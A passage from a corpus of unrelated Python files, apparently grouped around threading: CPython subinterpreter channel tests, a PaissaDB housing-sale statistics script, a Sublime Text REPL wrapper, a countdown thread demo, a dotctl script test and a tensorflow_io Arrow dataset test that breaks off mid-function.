class ChannelReleaseTests(TestBase):
# XXX Add more test coverage a la the tests for close().
"""
- main / interp / other
- run in: current thread / new thread / other thread / different threads
- end / opposite
- force / no force
- used / not used (associated / not associated)
- empty / emptied / never emptied / partly emptied
- closed / not closed
- released / not released
- creator (interp) / other
- associated interpreter not running
- associated interpreter destroyed
"""
"""
use
pre-release
release
after
check
"""
"""
release in: main, interp1
creator: same, other (incl. interp2)
use: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
pre-release: None,send,recv,both in None,same,other(incl. interp2),same+other(incl. interp2),all
pre-release forced: None,send,recv,both in None,same,other(incl. interp2),same+other(incl. interp2),all
release: same
release forced: same
use after: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
release after: None,send,recv,send/recv in None,same,other(incl. interp2),same+other(incl. interp2),all
check released: send/recv for same/other(incl. interp2)
check closed: send/recv for same/other(incl. interp2)
"""
def test_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_multiple_users(self):
cid = interpreters.channel_create()
id1 = interpreters.create()
id2 = interpreters.create()
interpreters.run_string(id1, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_send({cid}, b'spam')
"""))
out = _run_output(id2, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_recv({cid})
_interpreters.channel_release({cid})
print(repr(obj))
"""))
interpreters.run_string(id1, dedent(f"""
_interpreters.channel_release({cid})
"""))
self.assertEqual(out.strip(), "b'spam'")
def test_no_kwargs(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_multiple_times(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_release(cid, send=True, recv=True)
def test_with_unused_items(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'ham')
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_never_used(self):
cid = interpreters.channel_create()
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_by_unassociated_interp(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
_interpreters.channel_release({cid})
"""))
obj = interpreters.channel_recv(cid)
interpreters.channel_release(cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
self.assertEqual(obj, b'spam')
def test_close_if_unassociated(self):
# XXX Something's not right with this test...
cid = interpreters.channel_create()
interp = interpreters.create()
interpreters.run_string(interp, dedent(f"""
import _xxsubinterpreters as _interpreters
obj = _interpreters.channel_send({cid}, b'spam')
_interpreters.channel_release({cid})
"""))
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
def test_partially(self):
# XXX Is partial close too weird/confusing?
cid = interpreters.channel_create()
interpreters.channel_send(cid, None)
interpreters.channel_recv(cid)
interpreters.channel_send(cid, b'spam')
interpreters.channel_release(cid, send=True)
obj = interpreters.channel_recv(cid)
self.assertEqual(obj, b'spam')
def test_used_multiple_times_by_single_user(self):
cid = interpreters.channel_create()
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_send(cid, b'spam')
interpreters.channel_recv(cid)
interpreters.channel_release(cid, send=True, recv=True)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(cid, b'eggs')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(cid)
class ChannelCloseFixture(namedtuple('ChannelCloseFixture',
'end interp other extra creator')):
# Set this to True to avoid creating interpreters, e.g. when
# scanning through test permutations without running them.
QUICK = False
def __new__(cls, end, interp, other, extra, creator):
assert end in ('send', 'recv')
if cls.QUICK:
known = {}
else:
interp = Interpreter.from_raw(interp)
other = Interpreter.from_raw(other)
extra = Interpreter.from_raw(extra)
known = {
interp.name: interp,
other.name: other,
extra.name: extra,
}
if not creator:
creator = 'same'
self = super().__new__(cls, end, interp, other, extra, creator)
self._prepped = set()
self._state = ChannelState()
self._known = known
return self
@property
def state(self):
return self._state
@property
def cid(self):
try:
return self._cid
except AttributeError:
creator = self._get_interpreter(self.creator)
self._cid = self._new_channel(creator)
return self._cid
def get_interpreter(self, interp):
interp = self._get_interpreter(interp)
self._prep_interpreter(interp)
return interp
def expect_closed_error(self, end=None):
if end is None:
end = self.end
if end == 'recv' and self.state.closed == 'send':
return False
return bool(self.state.closed)
def prep_interpreter(self, interp):
self._prep_interpreter(interp)
def record_action(self, action, result):
self._state = result
def clean_up(self):
clean_up_interpreters()
clean_up_channels()
# internal methods
def _new_channel(self, creator):
if creator.name == 'main':
return interpreters.channel_create()
else:
ch = interpreters.channel_create()
run_interp(creator.id, f"""
import _xxsubinterpreters
cid = _xxsubinterpreters.channel_create()
# We purposefully send back an int to avoid tying the
# channel to the other interpreter.
_xxsubinterpreters.channel_send({ch}, int(cid))
del _xxsubinterpreters
""")
self._cid = interpreters.channel_recv(ch)
return self._cid
def _get_interpreter(self, interp):
if interp in ('same', 'interp'):
return self.interp
elif interp == 'other':
return self.other
elif interp == 'extra':
return self.extra
else:
name = interp
try:
interp = self._known[name]
except KeyError:
interp = self._known[name] = Interpreter(name)
return interp
def _prep_interpreter(self, interp):
if interp.id in self._prepped:
return
self._prepped.add(interp.id)
if interp.name == 'main':
return
run_interp(interp.id, f"""
import _xxsubinterpreters as interpreters
import test.test__xxsubinterpreters as helpers
ChannelState = helpers.ChannelState
try:
cid
except NameError:
cid = interpreters._channel_id({self.cid})
""")
@unittest.skip('these tests take several hours to run')
class ExhaustiveChannelTests(TestBase):
"""
- main / interp / other
- run in: current thread / new thread / other thread / different threads
- end / opposite
- force / no force
- used / not used (associated / not associated)
- empty / emptied / never emptied / partly emptied
- closed / not closed
- released / not released
- creator (interp) / other
- associated interpreter not running
- associated interpreter destroyed
- close after unbound
"""
"""
use
pre-close
close
after
check
"""
"""
close in: main, interp1
creator: same, other, extra
use: None,send,recv,send/recv in None,same,other,same+other,all
pre-close: None,send,recv in None,same,other,same+other,all
pre-close forced: None,send,recv in None,same,other,same+other,all
close: same
close forced: same
use after: None,send,recv,send/recv in None,same,other,extra,same+other,all
close after: None,send,recv,send/recv in None,same,other,extra,same+other,all
check closed: send/recv for same/other(incl. interp2)
"""
def iter_action_sets(self):
# - used / not used (associated / not associated)
# - empty / emptied / never emptied / partly emptied
# - closed / not closed
# - released / not released
# never used
yield []
# only pre-closed (and possible used after)
for closeactions in self._iter_close_action_sets('same', 'other'):
yield closeactions
for postactions in self._iter_post_close_action_sets():
yield closeactions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
yield closeactions
for postactions in self._iter_post_close_action_sets():
yield closeactions + postactions
# used
for useactions in self._iter_use_action_sets('same', 'other'):
yield useactions
for closeactions in self._iter_close_action_sets('same', 'other'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for useactions in self._iter_use_action_sets('other', 'extra'):
yield useactions
for closeactions in self._iter_close_action_sets('same', 'other'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
for closeactions in self._iter_close_action_sets('other', 'extra'):
actions = useactions + closeactions
yield actions
for postactions in self._iter_post_close_action_sets():
yield actions + postactions
def _iter_use_action_sets(self, interp1, interp2):
interps = (interp1, interp2)
# only recv end used
yield [
ChannelAction('use', 'recv', interp1),
]
yield [
ChannelAction('use', 'recv', interp2),
]
yield [
ChannelAction('use', 'recv', interp1),
ChannelAction('use', 'recv', interp2),
]
# never emptied
yield [
ChannelAction('use', 'send', interp1),
]
yield [
ChannelAction('use', 'send', interp2),
]
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
]
# partially emptied
for interp1 in interps:
for interp2 in interps:
for interp3 in interps:
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
ChannelAction('use', 'recv', interp3),
]
# fully emptied
for interp1 in interps:
for interp2 in interps:
for interp3 in interps:
for interp4 in interps:
yield [
ChannelAction('use', 'send', interp1),
ChannelAction('use', 'send', interp2),
ChannelAction('use', 'recv', interp3),
ChannelAction('use', 'recv', interp4),
]
def _iter_close_action_sets(self, interp1, interp2):
ends = ('recv', 'send')
interps = (interp1, interp2)
for force in (True, False):
op = 'force-close' if force else 'close'
for interp in interps:
for end in ends:
yield [
ChannelAction(op, end, interp),
]
for recvop in ('close', 'force-close'):
for sendop in ('close', 'force-close'):
for recv in interps:
for send in interps:
yield [
ChannelAction(recvop, 'recv', recv),
ChannelAction(sendop, 'send', send),
]
def _iter_post_close_action_sets(self):
for interp in ('same', 'extra', 'other'):
yield [
ChannelAction('use', 'recv', interp),
]
yield [
ChannelAction('use', 'send', interp),
]
def run_actions(self, fix, actions):
for action in actions:
self.run_action(fix, action)
def run_action(self, fix, action, *, hideclosed=True):
end = action.resolve_end(fix.end)
interp = action.resolve_interp(fix.interp, fix.other, fix.extra)
fix.prep_interpreter(interp)
if interp.name == 'main':
result = run_action(
fix.cid,
action.action,
end,
fix.state,
hideclosed=hideclosed,
)
fix.record_action(action, result)
else:
_cid = interpreters.channel_create()
run_interp(interp.id, f"""
result = helpers.run_action(
{fix.cid},
{repr(action.action)},
{repr(end)},
{repr(fix.state)},
hideclosed={hideclosed},
)
interpreters.channel_send({_cid}, result.pending.to_bytes(1, 'little'))
interpreters.channel_send({_cid}, b'X' if result.closed else b'')
""")
result = ChannelState(
pending=int.from_bytes(interpreters.channel_recv(_cid), 'little'),
closed=bool(interpreters.channel_recv(_cid)),
)
fix.record_action(action, result)
def iter_fixtures(self):
# XXX threads?
interpreters = [
('main', 'interp', 'extra'),
('interp', 'main', 'extra'),
('interp1', 'interp2', 'extra'),
('interp1', 'interp2', 'main'),
]
for interp, other, extra in interpreters:
for creator in ('same', 'other', 'creator'):
for end in ('send', 'recv'):
yield ChannelCloseFixture(end, interp, other, extra, creator)
def _close(self, fix, *, force):
op = 'force-close' if force else 'close'
close = ChannelAction(op, fix.end, 'same')
if not fix.expect_closed_error():
self.run_action(fix, close, hideclosed=False)
else:
with self.assertRaises(interpreters.ChannelClosedError):
self.run_action(fix, close, hideclosed=False)
def _assert_closed_in_interp(self, fix, interp=None):
if interp is None or interp.name == 'main':
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_recv(fix.cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_send(fix.cid, b'spam')
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(fix.cid)
with self.assertRaises(interpreters.ChannelClosedError):
interpreters.channel_close(fix.cid, force=True)
else:
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_recv(cid)
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_send(cid, b'spam')
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_close(cid)
""")
run_interp(interp.id, f"""
with helpers.expect_channel_closed():
interpreters.channel_close(cid, force=True)
""")
def _assert_closed(self, fix):
self.assertTrue(fix.state.closed)
for _ in range(fix.state.pending):
interpreters.channel_recv(fix.cid)
self._assert_closed_in_interp(fix)
for interp in ('same', 'other'):
interp = fix.get_interpreter(interp)
if interp.name == 'main':
continue
self._assert_closed_in_interp(fix, interp)
interp = fix.get_interpreter('fresh')
self._assert_closed_in_interp(fix, interp)
def _iter_close_tests(self, verbose=False):
i = 0
for actions in self.iter_action_sets():
print()
for fix in self.iter_fixtures():
i += 1
if i > 1000:
return
if verbose:
if (i - 1) % 6 == 0:
print()
print(i, fix, '({} actions)'.format(len(actions)))
else:
if (i - 1) % 6 == 0:
print(' ', end='')
print('.', end=''); sys.stdout.flush()
yield i, fix, actions
if verbose:
print('---')
print()
# This is useful for scanning through the possible tests.
def _skim_close_tests(self):
ChannelCloseFixture.QUICK = True
for i, fix, actions in self._iter_close_tests():
pass
def test_close(self):
for i, fix, actions in self._iter_close_tests():
with self.subTest('{} {} {}'.format(i, fix, actions)):
fix.prep_interpreter(fix.interp)
self.run_actions(fix, actions)
self._close(fix, force=False)
self._assert_closed(fix)
# XXX Things slow down if we have too many interpreters.
fix.clean_up()
def test_force_close(self):
for i, fix, actions in self._iter_close_tests():
with self.subTest('{} {} {}'.format(i, fix, actions)):
fix.prep_interpreter(fix.interp)
self.run_actions(fix, actions)
self._close(fix, force=True)
self._assert_closed(fix)
# XXX Things slow down if we have too many interpreters.
fix.clean_up()
if __name__ == '__main__':
unittest.main()
|
sales.py
|
"""
Saves a CSV of all plot sales to an output folder.
Methodology:
To reduce the amount of plots in memory at any one point, this script iterates over each district in each world
independently. It first begins by getting the latest state of all plots (1,440 per district). For each individual plot,
it then iterates over the plot's history in reverse chronological order searching for state transitions.
When it encounters a state transition, it uses PaissaDB methods to estimate the earliest and latest time the transition
could have happened. If the transition was a sale, it determines whether the sale was a relocation using two methods:
1. If the plot does not have a house built, it's likely not a relocation.
2. Otherwise, search for any plot on the same world owned by the new owner up to one week prior to the earliest sell
time. If any is found, it is likely a relocation. Otherwise, assume it's a first-time buyer.
If the transition was an opening, pair it with the next chronological sale. Use these pairs to emit PlotSale records.
* Note: This script was able to lock all 8 cores of an i9-9900K at 100% for ~20 minutes. I recommend running this on
a very capable computer.
"""
import os
import sys
import time
from stats.utils import PlotSale
# set working tz to UTC, if on Windows you should do this system-wide in time settings
if sys.platform != 'win32':
os.environ['TZ'] = 'Etc/UTC'
time.tzset()
else:
input("Make sure your system clock is set to UTC! (Press enter to continue)")
import csv
import datetime
from contextlib import contextmanager
import threading
import queue
from paissadb import calc, crud, models
from paissadb.database import SessionLocal
# threading: setting this to 1 on slower systems and (num cpus) on faster systems is generally fine
NUM_THREADS = 4
district_q = queue.Queue()
sale_q = queue.Queue()
# ==== helpers ====
@contextmanager
def timer(prefix, name, indent=0):
start = time.monotonic()
print(f"{' ' * indent}[{prefix}] started {name}")
yield
end = time.monotonic()
print(f"{' ' * indent}[{prefix}] finished {name} in {end - start:.2f}s")
def is_new_owner(db, plot, sale_details):
"""
Returns whether the current owner of the given plot is a new owner, or if they have owned another house within
the last week.
"""
if not plot.has_built_house:
return True
# oh boy
# time to make a chonky query (~1500ms cold)
owned = db.query(models.Plot) \
.filter(models.Plot.world_id == plot.world_id) \
.filter(models.Plot.timestamp < sale_details.est_time_sold_min,
models.Plot.timestamp >= sale_details.est_time_sold_min - datetime.timedelta(days=7)) \
.filter(models.Plot.owner_name == plot.owner_name) \
.first()
return owned is None
# ==== stats ====
class SaleStatGenerator:
def __init__(self, db, plot: models.Plot):
self.db = db
self.plot = plot
# main entrypoint
def do_stats(self):
last = self.plot # technically next chronologically
for current in crud.plot_history(self.db, self.plot):
if last.is_owned and not current.is_owned:
yield self._on_sale(last, current)
last = current
# helpers
def _on_sale(self, last, current):
"""
Called when *last* is the first datapoint after a plot sells, and *current* is the last datapoint before a plot
sells.
"""
sale_details = calc.sold_plot_detail(self.db, last)
opening_details = calc.open_plot_detail(self.db, current, now=current.timestamp)
sale_is_relo = not is_new_owner(self.db, last, sale_details)
return PlotSale(
world_id=self.plot.world_id,
territory_type_id=self.plot.territory_type_id,
ward_number=self.plot.ward_number,
plot_number=self.plot.plot_number,
time_open_min=opening_details.est_time_open_min,
time_open_max=opening_details.est_time_open_max,
time_sold_min=sale_details.est_time_sold_min,
time_sold_max=sale_details.est_time_sold_max,
is_relo=sale_is_relo,
known_price=opening_details.known_price,
last_presale_data_id=current.id
)
def queue_processing():
with SessionLocal() as db:
for world in crud.get_worlds(db):
for district in crud.get_districts(db):
district_q.put((world.id, district.id))
def t_processor():
while True:
world_id, district_id = district_q.get()
with SessionLocal() as db:
district = crud.get_district_by_id(db, district_id)
world = crud.get_world_by_id(db, world_id)
with timer(f'T-{threading.get_ident()}', f'{world_id}-{district_id} ({world.name}, {district.name})'):
latest_plots = crud.get_latest_plots_in_district(db, world_id, district_id)
for plot in latest_plots:
statter = SaleStatGenerator(db, plot)
for result in statter.do_stats():
sale_q.put(result)
district_q.task_done()
def t_writer():
with open('sales.csv', 'w', newline='') as f:
writer = csv.DictWriter(f, fieldnames=PlotSale.__fields__.keys())
writer.writeheader()
while True:
plot_sale = sale_q.get()
writer.writerow(plot_sale.dict())
sale_q.task_done()
def run():
threads = []
queue_processing()
# launch worker threads
for _ in range(NUM_THREADS):
t = threading.Thread(target=t_processor, daemon=True)
t.start()
threads.append(t)
# launch writer thread
t = threading.Thread(target=t_writer, daemon=True)
t.start()
threads.append(t)
# wait for all tasks to complete before returning
district_q.join()
sale_q.join()
if __name__ == '__main__':
with timer('MAIN', 'all'):
run()
|
sublimepython_repl.py
|
# encoding: utf-8
import code
import contextlib
from .repl import Repl
try:
from queue import Queue
except ImportError:
from Queue import Queue
import sys
import threading
import sublime
class QueueOut(object):
def __init__(self, queue):
self.queue = queue
def write(self, data):
self.queue.put(data)
@contextlib.contextmanager
def redirect_stdio(queue):
orig = (sys.stdout, sys.stderr)
sys.stdout = sys.stderr = QueueOut(queue)
yield
(sys.stdout, sys.stderr) = orig
class SublimeLocals(dict):
def __init__(self, *args, **kwds):
import pydoc
super(SublimeLocals, self).__init__(*args, **kwds)
self['sublime'] = sublime
self['__name__'] = "__main__"
self['view'] = None
self['window'] = None
self['help'] = pydoc.help
def __getitem__(self, key):
if key == 'window':
return sublime.active_window()
if key == 'view':
return sublime.active_window().active_view()
return super(SublimeLocals, self).__getitem__(key)
class InterceptingConsole(code.InteractiveConsole):
PS1 = ">>> "
PS2 = "... "
def __init__(self, encoding):
code.InteractiveConsole.__init__(self, locals=SublimeLocals())
self.input = Queue()
self.output = Queue()
self.output.put(self.PS1)
self._encoding = encoding
def write(self, data):
self.output.put(data)
def push(self, line):
with redirect_stdio(self.output):
more = code.InteractiveConsole.push(self, line.decode(self._encoding))
self.output.put(self.PS2 if more else self.PS1)
return more
def run(self):
while True:
line = self.input.get()
if line is None:
break
self.push(line)
class SublimePythonRepl(Repl):
TYPE = "sublime_python"
def __init__(self, encoding):
super(SublimePythonRepl, self).__init__(encoding, "python", "\n", False)
self._console = InterceptingConsole(encoding)
self._thread = threading.Thread(target=self._console.run)
self._thread.start()
def name(self):
return "sublime"
def is_alive(self):
return True
def write_bytes(self, bytes):
self._console.input.put(bytes)
def read_bytes(self):
return self._console.output.get().encode(self._encoding)
def kill(self):
self._console.input.put(None)
|
threading_02_demo.py
|
# -*- coding: utf-8 -*-
import time
from threading import Thread
class CountdownTask:
def __init__(self):
self._running = True
def terminate(self):
self._running = False
def run(self, n):
while self._running and n > 0:
print('T-minus', n)
n -= 1
time.sleep(5)
c = CountdownTask()
t = Thread(target=c.run, args=(10,))
t.start()
c.terminate() # Signal termination
t.join() # Wait for actual termination (if needed)
|
scripts_test.py
|
import os
from multiprocessing import Process
from pytest import CaptureFixture
from dotctl.context import Context
from dotctl.manager import Manager, run_setup_script
from dotctl.scripts import messages
def test_script(capfd: CaptureFixture[str]):
context = Context(os.path.realpath("tests/dotfiles"))
context.update_environment()
script_path = os.path.realpath("tests/dotfiles/.setup.d/00-echo.py")
process = Process(target=run_setup_script, args=(script_path,))
process.start()
process.join()
assert process.exitcode == 0
captured = capfd.readouterr()
assert captured.err == "", "error output is not empty"
# captured output is out-of-order due to how pytest handles [sub]processes.
# Both Process and subprocess instances use Popen under the hood, which is
# buffered and is only captured after the process exits. Installer classes
# uses a subprocess.run to execute commands, and the whole setup script is
# executed as a Process. That means a sample process tree for a script is:
#
# Process X [script]
# subprocess.run 1 [list, if configured]
# subprocess.run 2 [install/uninstall package 1]
# subprocess.run N [install/uninstall package N]
#
# the captured output, as seen by pytest, will then be:
#
# subprocess.run 1 [list, if configured]
# subprocess.run 2 [install/uninstall package 1]
# subprocess.run N [install/uninstall package N]
# Process X [script]
#
assert captured.out == "\n".join([
"install foo",
"install baz",
messages.script("Test packages"),
"checking %s..." % messages.package("echo"),
"checking %s..." % messages.package("foo"),
"installing %s..." % messages.package("foo"),
"checking %s..." % messages.package("bar"),
"checking %s..." % messages.package("baz"),
"installing %s..." % messages.package("baz"),
"",
]), "script output does not match"
|
test_arrow.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
# ==============================================================================
"""Tests for ArrowDataset."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import os
import sys
import socket
import tempfile
import threading
import pytest
import tensorflow
tensorflow.compat.v1.disable_eager_execution()
from tensorflow import dtypes # pylint: disable=wrong-import-position
from tensorflow import errors # pylint: disable=wrong-import-position
from tensorflow import test # pylint: disable=wrong-import-position
from tensorflow.compat.v1 import data # pylint: disable=wrong-import-position
import tensorflow_io.arrow as arrow_io # pylint: disable=wrong-import-position
if sys.version_info == (3, 4):
pytest.skip(
"pyarrow is not supported with python 3.4", allow_module_level=True)
import pyarrow as pa # pylint: disable=wrong-import-position
from pyarrow.feather import write_feather # pylint: disable=wrong-import-position
TruthData = namedtuple("TruthData", ["data", "output_types", "output_shapes"])
class ArrowDatasetTest(test.TestCase):
"""ArrowDatasetTest"""
@classmethod
def setUpClass(cls): # pylint: disable=invalid-name
"""setUpClass"""
cls.scalar_data = [
[True, False, True, True],
[1, 2, -3, 4],
[1, 2, -3, 4],
[1, 2, -3, 4],
[1, 2, -3, 4],
[1, 2, 3, 4],
[1, 2, 3, 4],
[1, 2, 3, 4],
[1, 2, 3, 4],
[1.1, 2.2, 3.3, 4.4],
[1.1, 2.2, 3.3, 4.4],
]
cls.scalar_dtypes = (
dtypes.bool,
dtypes.int8,
dtypes.int16,
dtypes.int32,
dtypes.int64,
dtypes.uint8,
dtypes.uint16,
dtypes.uint32,
dtypes.uint64,
dtypes.float32,
dtypes.float64
)
cls.scalar_shapes = tuple(
[tensorflow.TensorShape([]) for _ in cls.scalar_dtypes])
cls.list_data = [
[[1, 1], [2, 2], [3, 3], [4, 4]],
[[1], [2, 2], [3, 3, 3], [4, 4, 4]],
[[1, 1], [2, 2], [3, 3], [4, 4]],
[[1.1, 1.1], [2.2, 2.2], [3.3, 3.3], [4.4, 4.4]],
[[1.1], [2.2, 2.2], [3.3, 3.3, 3.3], [4.4, 4.4, 4.4]],
[[1.1, 1.1], [2.2, 2.2], [3.3, 3.3], [4.4, 4.4]],
]
cls.list_dtypes = (
dtypes.int32,
dtypes.int32,
dtypes.int64,
dtypes.float32,
dtypes.float32,
dtypes.float64
)
cls.list_shapes = tuple(
[tensorflow.TensorShape([None]) for _ in cls.list_dtypes])
def run_test_case(self, dataset, truth_data):
"""run_test_case"""
iterator = data.make_one_shot_iterator(dataset)
next_element = iterator.get_next()
def is_float(dtype):
return dtype in [dtypes.float16, dtypes.float32, dtypes.float64]
with self.test_session() as sess:
for row in range(len(truth_data.data[0])):
value = sess.run(next_element)
for i, col in enumerate(dataset.columns):
if truth_data.output_shapes[col].ndims == 0:
if is_float(truth_data.output_types[col]):
self.assertAlmostEqual(value[i], truth_data.data[col][row], 4)
else:
self.assertEqual(value[i], truth_data.data[col][row])
elif truth_data.output_shapes[col].ndims == 1:
if is_float(truth_data.output_types[col]):
for j, v in enumerate(value[i]):
self.assertAlmostEqual(v, truth_data.data[col][row][j], 4)
else:
self.assertListEqual(value[i].tolist(), truth_data.data[col][row])
def get_arrow_type(self, dt, is_list):
"""get_arrow_type"""
if dt == dtypes.bool:
arrow_type = pa.bool_()
elif dt == dtypes.int8:
arrow_type = pa.int8()
elif dt == dtypes.int16:
arrow_type = pa.int16()
elif dt == dtypes.int32:
arrow_type = pa.int32()
elif dt == dtypes.int64:
arrow_type = pa.int64()
elif dt == dtypes.uint8:
arrow_type = pa.uint8()
elif dt == dtypes.uint16:
arrow_type = pa.uint16()
elif dt == dtypes.uint32:
arrow_type = pa.uint32()
elif dt == dtypes.uint64:
arrow_type = pa.uint64()
elif dt == dtypes.float16:
arrow_type = pa.float16()
elif dt == dtypes.float32:
arrow_type = pa.float32()
elif dt == dtypes.float64:
arrow_type = pa.float64()
else:
raise TypeError("Unsupported dtype for Arrow" + str(dt))
if is_list:
arrow_type = pa.list_(arrow_type)
return arrow_type
def make_record_batch(self, truth_data):
arrays = [pa.array(truth_data.data[col],
type=self.get_arrow_type(
truth_data.output_types[col],
truth_data.output_shapes[col].ndims == 1))
for col in range(len(truth_data.output_types))]
names = ["%s_[%s]" % (i, a.type) for i, a in enumerate(arrays)]
return pa.RecordBatch.from_arrays(arrays, names)
def test_arrow_dataset(self):
"""test_arrow_dataset"""
truth_data = TruthData(
self.scalar_data + self.list_data,
self.scalar_dtypes + self.list_dtypes,
self.scalar_shapes + self.list_shapes)
batch = self.make_record_batch(truth_data)
# test all columns selected
dataset = arrow_io.ArrowDataset(
batch,
list(range(len(truth_data.output_types))),
truth_data.output_types,
truth_data.output_shapes)
self.run_test_case(dataset, truth_data)
# test column selection
columns = (1, 3, len(truth_data.output_types) - 1)
dataset = arrow_io.ArrowDataset(
batch,
columns,
tuple([truth_data.output_types[c] for c in columns]),
tuple([truth_data.output_shapes[c] for c in columns]))
self.run_test_case(dataset, truth_data)
# test construction from pd.DataFrame
df = batch.to_pandas()
dataset = arrow_io.ArrowDataset.from_pandas(
df, preserve_index=False)
self.run_test_case(dataset, truth_data)
def test_from_pandas_preserve_index(self):
"""test_from_pandas_preserve_index"""
data_v = [
[1.0, 2.0, 3.0],
[0.2, 0.4, 0.8],
]
truth_data = TruthData(
data_v,
(dtypes.float32, dtypes.float32),
(tensorflow.TensorShape([]), tensorflow.TensorShape([])))
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
dataset = arrow_io.ArrowDataset.from_pandas(
df, preserve_index=True)
# Add index column to test data to check results
truth_data_with_index = TruthData(
truth_data.data + [range(len(truth_data.data[0]))],
truth_data.output_types + (dtypes.int64,),
truth_data.output_shapes + (tensorflow.TensorShape([]),))
self.run_test_case(dataset, truth_data_with_index)
# Test preserve_index again, selecting second column only
# NOTE: need to select TruthData because `df` gets selected also
truth_data_selected_with_index = TruthData(
truth_data_with_index.data[1:],
truth_data_with_index.output_types[1:],
truth_data_with_index.output_shapes[1:])
dataset = arrow_io.ArrowDataset.from_pandas(
df, columns=(1,), preserve_index=True)
self.run_test_case(dataset, truth_data_selected_with_index)
def test_arrow_feather_dataset(self):
"""test_arrow_feather_dataset"""
# Feather files currently do not support columns of list types
truth_data = TruthData(self.scalar_data, self.scalar_dtypes,
self.scalar_shapes)
batch = self.make_record_batch(truth_data)
df = batch.to_pandas()
# Create a tempfile that is deleted after tests run
with tempfile.NamedTemporaryFile(delete=False) as f:
write_feather(df, f)
# test single file
dataset = arrow_io.ArrowFeatherDataset(
f.name,
list(range(len(truth_data.output_types))),
truth_data.output_types,
truth_data.output_shapes)
self.run_test_case(dataset, truth_data)
# test multiple files
dataset = arrow_io.ArrowFeatherDataset(
[f.name, f.name],
list(range(len(truth_data.output_types))),
truth_data.output_types,
truth_data.output_shapes)
truth_data_doubled = TruthData(
[d * 2 for d in truth_data.data],
truth_data.output_types,
truth_data.output_shapes)
self.run_test_case(dataset, truth_data_doubled)
# test construction from schema
dataset = arrow_io.ArrowFeatherDataset.from_schema(
f.name, batch.schema)
self.run_test_case(dataset, truth_data)
os.unlink(f.name)
def test_arrow_socket_dataset(self):
"""test_arrow_socket_dataset"""
truth_data = TruthData(
self.scalar_data + self.list_data,
self.scalar_dtypes + self.list_dtypes,
self.scalar_shapes + self.list_shapes)
batch = self.make_record_batch(truth_data)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('127.0.0.1', 0))
sock.listen(1)
host_addr, port = sock.getsockname()
host = "%s:%s" % (host_addr, port)
def run_server(num_batches):
conn, _ = sock.accept()
outfile = conn.makefile(mode='wb')
writer = pa.RecordBatchStreamWriter(outfile, batch.schema)
for _ in range(num_batches):
writer.write_batch(batch)
writer.close()
outfile.close()
conn.close()
sock.close()
# test with multiple batches, construct from schema
num_batches = 2
server = threading.Thread(target=run_server, args=(num_batches,))
server.start()
dataset = arrow_io.ArrowStreamDataset.from_schema(
host, batch.schema)
truth_data_mult = TruthData(
[d * num_batches for d in truth_data.data],
truth_data.output_types,
truth_data.output_shapes)
self.run_test_case(dataset, truth_data_mult)
server.join()
def test_bool_array_type(self):
"""
NOTE: need to test this seperately because to_pandas fails with
ArrowNotImplementedError:
Not implemented type for list in DataFrameBlock: bool
see https://issues.apache.org/jira/browse/ARROW-4370
"""
truth_data = TruthData(
